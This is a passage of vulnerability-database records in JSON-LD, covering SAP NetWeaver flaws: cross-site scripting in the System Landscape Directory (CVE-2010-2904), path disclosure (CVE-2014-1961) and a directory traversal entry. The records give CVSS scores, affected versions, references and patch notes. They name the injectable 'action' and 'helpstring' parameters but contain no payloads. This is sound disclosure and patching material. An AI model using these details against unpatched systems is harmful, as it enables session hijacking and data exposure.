]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-10T00:00:00",
"db": "BID",
"id": "92421"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-10T00:00:00",
"db": "BID",
"id": "92421"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "92421"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS ABAP Directory Traversal Vulnerability",
"sources": [
{
"db": "BID",
"id": "92421"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "92421"
}
],
"trust": 0.3
}
}
var-201007-0283
Vulnerability from variot
Multiple cross-site scripting (XSS) vulnerabilities in the System Landscape Directory (SLD) component 6.4 through 7.02 in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter to testsdic and the (2) helpstring parameter to paramhelp.jsp. System Landscape Directory is prone to a cross-site scripting vulnerability. ----------------------------------------------------------------------
"From 2007 to 2009 vulnerabilities in a typical end-user PC almost doubled from about 220 to 420."
Non-Microsoft software to blame for increase in vulnerabilities affecting typical Windows end-users, read more:
http://secunia.com/gfx/pdf/Secunia_Half_Year_Report_2010.pdf
TITLE: SAP NetWeaver System Landscape Directory Component Cross-Site Scripting
SECUNIA ADVISORY ID: SA40712
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/40712/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=40712
RELEASE DATE: 2010-07-28
DISCUSS ADVISORY: http://secunia.com/advisories/40712/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/40712/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=40712
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Some vulnerabilities have been reported in SAP NetWeaver, which can be exploited by malicious people to conduct cross-site scripting attacks.
Input passed via the "action" parameter to testsdic and via the "helpstring" parameter to paramhelp.jsp in the System Landscape Directory component is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
SOLUTION: Patches are available via SAP note 1416047.
Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY: Alexander Polyakov, Digital Security Research Group [DSecRG]
ORIGINAL ADVISORY: SAP (note 1416047): https://service.sap.com/sap/support/notes/1416047
DSecRG-09-068: http://dsecrg.com/pages/vul/show.php?id=168
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201007-0283",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "system landscape directory",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.02"
},
{
"model": "system landscape directory",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "system landscape directory",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "6.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.3,
"vendor": "sap",
"version": "6.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "*"
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "system landscape directory",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "6.4 to 7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "73602"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005602"
},
{
"db": "NVD",
"id": "CVE-2010-2904"
},
{
"db": "CNNVD",
"id": "CNNVD-201007-294"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:system_landscape_directory:6.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:system_landscape_directory:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:system_landscape_directory:7.02:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:6.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2010-2904"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "73602"
}
],
"trust": 0.3
},
"cve": "CVE-2010-2904",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2010-2904",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2010-2904",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201007-294",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-005602"
},
{
"db": "NVD",
"id": "CVE-2010-2904"
},
{
"db": "CNNVD",
"id": "CNNVD-201007-294"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in the System Landscape Directory (SLD) component 6.4 through 7.02 in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter to testsdic and the (2) helpstring parameter to paramhelp.jsp. System Landscape Directory is prone to a cross-site scripting vulnerability. ----------------------------------------------------------------------\n\n\n\"From 2007 to 2009 vulnerabilities in a typical end-user PC almost doubled from about 220 to 420.\"\n\nNon-Microsoft software to blame for increase in vulnerabilities affecting typical Windows end-users, read more:\n\nhttp://secunia.com/gfx/pdf/Secunia_Half_Year_Report_2010.pdf\n\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver System Landscape Directory Component Cross-Site\nScripting\n\nSECUNIA ADVISORY ID:\nSA40712\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/40712/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=40712\n\nRELEASE DATE:\n2010-07-28\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/40712/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/40712/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=40712\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in SAP NetWeaver, which can\nbe exploited by malicious people to conduct cross-site scripting\nattacks. \n\nInput passed via the \"action\" parameter to testsdic and via the\n\"helpstring\" parameter to paramhelp.jsp in the System Landscape\nDirectory component is not properly sanitised before being returned\nto the user. This can be exploited to execute arbitrary HTML and\nscript code in a user\u0027s browser session in context of an affected\nsite. \n\nSOLUTION:\nPatches are available via SAP note 1416047. \n\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nPROVIDED AND/OR DISCOVERED BY:\nAlexander Polyakov, Digital Security Research Group [DSecRG]\n\nORIGINAL ADVISORY:\nSAP (note 1416047):\nhttps://service.sap.com/sap/support/notes/1416047\n\nDSecRG-09-068:\nhttp://dsecrg.com/pages/vul/show.php?id=168\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-2904"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005602"
},
{
"db": "BID",
"id": "73602"
},
{
"db": "PACKETSTORM",
"id": "92207"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2010-2904",
"trust": 2.7
},
{
"db": "SECUNIA",
"id": "40712",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "66639",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "66640",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2010-1935",
"trust": 1.6
},
{
"db": "XF",
"id": "60668",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005602",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201007-294",
"trust": 0.6
},
{
"db": "BID",
"id": "73602",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "92207",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "73602"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005602"
},
{
"db": "PACKETSTORM",
"id": "92207"
},
{
"db": "NVD",
"id": "CVE-2010-2904"
},
{
"db": "CNNVD",
"id": "CNNVD-201007-294"
}
]
},
"id": "VAR-201007-0283",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:30:07.237000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NetWeaver",
"trust": 0.8,
"url": "http://scn.sap.com/community/netweaver"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-005602"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-005602"
},
{
"db": "NVD",
"id": "CVE-2010-2904"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://dsecrg.com/pages/vul/show.php?id=168"
},
{
"trust": 2.0,
"url": "https://service.sap.com/sap/support/notes/1416047"
},
{
"trust": 1.9,
"url": "http://packetstormsecurity.org/1007-advisories/dsecrg-09-068.txt"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/40712"
},
{
"trust": 1.6,
"url": "http://www.osvdb.org/66639"
},
{
"trust": 1.6,
"url": "http://www.osvdb.org/66640"
},
{
"trust": 1.6,
"url": "http://www.vupen.com/english/advisories/2010/1935"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/60668"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/60668"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2904"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-2904"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=40712"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/40712/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/40712/"
},
{
"trust": 0.1,
"url": "http://secunia.com/gfx/pdf/secunia_half_year_report_2010.pdf"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "BID",
"id": "73602"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005602"
},
{
"db": "PACKETSTORM",
"id": "92207"
},
{
"db": "NVD",
"id": "CVE-2010-2904"
},
{
"db": "CNNVD",
"id": "CNNVD-201007-294"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "73602"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005602"
},
{
"db": "PACKETSTORM",
"id": "92207"
},
{
"db": "NVD",
"id": "CVE-2010-2904"
},
{
"db": "CNNVD",
"id": "CNNVD-201007-294"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-07-28T00:00:00",
"db": "BID",
"id": "73602"
},
{
"date": "2012-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-005602"
},
{
"date": "2010-07-27T15:54:25",
"db": "PACKETSTORM",
"id": "92207"
},
{
"date": "2010-07-28T21:30:02.650000",
"db": "NVD",
"id": "CVE-2010-2904"
},
{
"date": "2010-07-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201007-294"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-07-28T00:00:00",
"db": "BID",
"id": "73602"
},
{
"date": "2012-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-005602"
},
{
"date": "2017-08-17T01:32:51.070000",
"db": "NVD",
"id": "CVE-2010-2904"
},
{
"date": "2010-07-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201007-294"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201007-294"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of SLD Component cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-005602"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "92207"
},
{
"db": "CNNVD",
"id": "CNNVD-201007-294"
}
],
"trust": 0.7
}
}
var-201402-0237
Vulnerability from variot
Unspecified vulnerability in the Portal WebDynPro in SAP NetWeaver allows remote attackers to obtain sensitive path information via unknown attack vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There are several vulnerabilities in SAP NetWeaver: 1. 2, the message server has an unspecified error, allowing the attacker to exploit the vulnerability to crash the server. 3. 4. SAP NetWeaver is prone to multiple security vulnerabilities, including: 1. An information-disclosure vulnerability 2. Multiple cross-site scripting vulnerabilities 3. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201402-0237",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": null
}
],
"sources": [
{
"db": "IVD",
"id": "5150a9f4-1eeb-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001411"
},
{
"db": "NVD",
"id": "CVE-2014-1961"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-204"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1961"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexander Polyakov, George Nosenko and Dmitry Chastukhin",
"sources": [
{
"db": "BID",
"id": "65547"
}
],
"trust": 0.3
},
"cve": "CVE-2014-1961",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2014-1961",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-01007",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
